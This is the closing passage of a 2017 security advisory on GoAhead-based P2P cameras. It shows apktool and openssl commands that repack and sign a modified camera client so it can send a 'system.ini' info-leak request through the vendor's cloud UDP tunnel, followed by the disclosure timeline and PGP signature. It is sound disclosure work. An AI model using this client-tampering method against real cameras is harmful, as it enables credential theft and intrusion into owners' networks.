    0001f6b0: 6e65 6374 2062 6567 696e 2e2e 2e25 7300  nect begin...%s.
    0001f6c0: 5050 5050 5f43 6f6e 6e65 6374 2066 6169  PPPP_Connect fai




Then, let's repack and sign the .apk:

    k% ./apktool b object.p2pwificam.client
    I: Using Apktool 2.2.2
    I: Checking whether sources has changed...
    I: Checking whether resources has changed...
    I: Building resources...
    S: WARNING: Could not write to $HOME (/nonexistent), using /tmp instead...
    S: Please be aware this is a volatile directory and frameworks
could go missing, please utilize --frame-path if the default storage
directory is unavailable
    W: warning: string 'conectar' has no default translation.
    W: warning: string 'str_ipcamfour' has no default translation.
    W: warning: string 'user_pwd_no_show' has no default translation.
    I: Copying libs... (/lib)
    I: Building apk file...
    I: Copying unknown files/dir...
    k% openssl genrsa -out key.pem

    Generating RSA private key, 2048 bit long modulus
    ..........................................+++
    ...................................................................+++
    unable to write 'random state'
    e is 65537 (0x010001)
    k% openssl req -new -key key.pem -out request.pem
    [...]
    k% openssl x509 -req -days 9999 -in request.pem -signkey key.pem
-out certificate.pem
    Signature ok
    subject=C = AU, ST = Some-State, O = Internet Widgits Pty Ltd
    Getting Private key
    unable to write 'random state'
    k% openssl pkcs8 -topk8 -outform DER -in key.pem -inform PEM -out
key.pk8 -nocrypt
    k% signapk certificate.pem key.pk8
object.p2pwificam.client/dist/object.p2pwificam.client.apk
signed-object.p2pwificam.client.apk
    k% ls  -latr
    total 21560
    drwxrwxrwt 3 root   root        140 Mar  7 08:25 ..
    -rwx------ 1 nobody nogroup 8488199 Mar  7 08:25 apktool.jar
    -rwx------ 1 nobody nogroup    2319 Mar  7 08:25 apktool
    -rwx------ 1 nobody nogroup 6773051 Mar  7 08:25
object.p2pwificam.client.apk
    drwx------ 9 nobody nogroup     220 Mar  7 08:33 object.p2pwificam.client
    -rw------- 1 nobody nogroup    1675 Mar  7 08:33 key.pem
    -rw------- 1 nobody nogroup     956 Mar  7 08:33 request.pem
    -rw------- 1 nobody nogroup    1111 Mar  7 08:33 certificate.pem
    -rw------- 1 nobody nogroup    1217 Mar  7 08:33 key.pk8
    drwx------ 3 nobody nogroup     220 Mar  7 08:34 .
    -rw------- 1 nobody nogroup 6787146 Mar  7 08:34
signed-object.p2pwificam.client.apk


`signed-object.p2pwificam.client.apk` is ready to be used.


When using it, we see that:


The client indeed sends the `system.ini` request within the UDP tunnel:

[please visit the HTML version at
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
to see the image]



The camera indeed receives this request within the UDP tunnel:

[please visit the HTML version at
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
to see the image]



Complete trace is:

[please visit the HTML version at
https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html
to see the image]


It appears the pre-auth is not easily reachable within the cloud network.

This "cloud" protocol seems to be more a botnet protocol than a legit
remote access protocol and has indeed weakness (everything in
clear-text, i.e. an attacker can attack cameras within the cloud and
leverage potential access to hack internal networks).

A lot of P2P ('Cloud') cameras are in fact using the same botnet
protocols and the same infrastructure seemingly to be managed by a
single entity.

Writing a PoC which bruteforces credentials of the remote camera is
left as an exercise for the reader.



## Vendor Response

Due to difficulties in finding and contacting all the vendors,
full-disclosure is applied.

I advise to IMMEDIATELY DISCONNECT cameras to the Internet. Hundreds
of thousands cameras are affected by the 0day Info-Leak. Millions of
them are using the insecure Cloud network.


## Report Timeline

* Feb 26, 2017: Vulnerabilities found by Pierre Kim.
* Mar 08, 2017: A public advisory is sent to security mailing lists.



## Credits

These vulnerabilities were found by Pierre Kim (@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJYv2UeAAoJEMQ+Dtp9ky28neMP/18McFaGxLqBaBjsbDFynjou
IZN/iA6FYm27lfGJ3RME9U+G0IwLzQuWshF2hGPsqmogxLRNRE5QB20Yy9P4+nyH
VtFqZ1tN6lfZhlQCKDlGr3UdYdwpuP+fNmC11KU153d3TT1c9lWjNnVcatEPPati
wbxJK0EwZ9T8UuzT/hweBPxRH9RDeWjWUjIBrv0+sLuwKrxkPgkE0IXKHLTLoKhy
DR0jQd5oCN8rorm5NCPGYCttBBSv0qwy4nIsgVzIViGoaumtrnOJUuwmHzVcvU1n
oAQVY/WwU2GLjWHqamAY9n4H6FEGYd+vGAtwnbxdVXAHwlHgY34sO7wuomHXNWwL
52Hwm+65qdBx9+iD9IPZtNoOgwPuOxp7RReEvj144EDbVptAUy62f4ilR05+XQZL
DmBxgqBwdLLVXBOnl/f7qj4ptERID2lW5XMUw6FURxXHrfle80Sgp/Yios8E/bcW
SyQJmAgRy3ZzQ7m4uUmIiUgAuyq2F2DA+CB7/8nkysPruw+In/Tdj5WIWTAAb8aT
ksZ05z+tGHYMXt8NlGvKLYcAmhU9Nw8X1KF4ChCuA59jy1fNjUplAyl6AemzAETB
Sknfr7lSQMGGY+GyQ1X3NxHfjAcWytpVsjb+/UOJE+Y+hHP59pRL5Smo1lOE9BWz
0VEWlkNCYSlBtIXqVQqW
=iiUl
-----END PGP SIGNATURE-----


-- 
Pierre Kim
pierre.kim.sec@gmail.com
@PierreKimSec
https://pierrekim.github.io/